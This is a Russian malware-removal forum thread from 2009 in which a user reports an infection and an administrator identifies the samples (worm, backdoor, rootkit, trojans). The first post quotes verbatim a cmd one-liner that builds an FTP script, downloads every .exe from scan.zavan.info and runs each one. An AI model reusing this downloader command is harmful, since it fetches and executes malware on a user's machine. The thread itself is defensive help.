Решена Много вирусов

Тема в разделе "Лечение компьютерных вирусов", создана пользователем Dukales, 11 фев 2009.

Статус темы:
Закрыта.
  1. Dukales
    Оффлайн

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    у меня та же проблема (была - переустановил Windows):
    я недавно заметил, что в процессах висит такая комманда:
    Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat

    с порождённой им ftp -i -s:k.x
    Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
    Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством :), закрывающей обзор в IE.
    На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся :). Я знал, что есть функция GetWindowText. Всё кончено - подумал я :(.
    Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
    8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
     
    Последнее редактирование: 11 фев 2009
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    auto.exe - Worm.Win32.AutoRun.ztg (аккуратнее с флешками)
    boot.exe - not-a-virus:AdWare.Win32.AdMedia.ed

    А также (папка viruses):
    Trojan-Downloader.Win32.VB.kmn
    Backdoor.Win32.Hupigon.fyvq
    Trojan-Downloader.Win32.Agent.bexi


    вывод: помойка однако :(

    Что неопознанно разошлю вирлабам.

    [info]Вложения удалил т.к. в основном пользователи не имеют достаточной квалификации для работы с мальварой, то они смогут заразится.
    [/info]
     
  3. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
  4. Dukales
    Оффлайн

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    да уж =( ... помойка - главное все враз скачались.

    Скажите пожалуйста, где искать эту комманду?
    Нигде я не нашёл - искал программкой autoruns с sysinternals.com

    Не подозреваю - всё переустанавливал как резведчик: драйвера с оффсайтов скачивал только, диски отцеплял, авторан выключил по маске 0xFF.
     
    Последнее редактирование: 11 фев 2009
  5. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    Смените пароли на "критических направлениях".
     
  6. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    Завершаем анализ:

    flowMediaDecoder_60.exe - Trojan.Win32.Agent2.dmq
    Rootkit.Win32.Small.uc
    Trojan.MulDrop.29482
    DDoS.Attack.123
     
  7. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    похоже батник в автозагрузке. Сделайте лог RSIT посмотрим (интернет не отключаем, для скачивания HJT).
     
  8. Dukales
    Оффлайн

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    дело в том, что я уже переустановил Windows - иначе никак не оживить было систему - поэтому, быть может ценные, следы пребывания этих злосчастных вирусов на моей машине исчезли...
    спасибо за помощь.
     
  9. Dukales
    Оффлайн

    Dukales Активный пользователь

    Сообщения:
    4
    Симпатии:
    0
    логи RSIT на всякий случай
     
    Последнее редактирование: 12 фев 2009
  10. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    Приятно смотреть на читсую машину :D
     
  11. anjeyvit
    Оффлайн

    anjeyvit Активный пользователь

    Сообщения:
    1
    Симпатии:
    0
    Аваст постоянно обнаруживает вирус Win32:Confi [Wrm]

    один находиться по адресу C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\... (создает себе папку а сам вирус остаеться в формате *.jpg или *.gif)
    другой, с именем файла х, но без расширения находиться по адресу C:\WINDOWS\system32

    Причем, если второй аваст благополучно удаляет, то насчет второго он говорит что произошла ошибка или файл используеться другим приложением, приходиться удалять вручную.
    помогите избавиться от этого
     
  12. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.450
    Симпатии:
    13.950
    Приветствую.

    Для корректной помощи нам необходимо увидеть Ваши логи :)
     
Статус темы:
Закрыта.

Поделиться этой страницей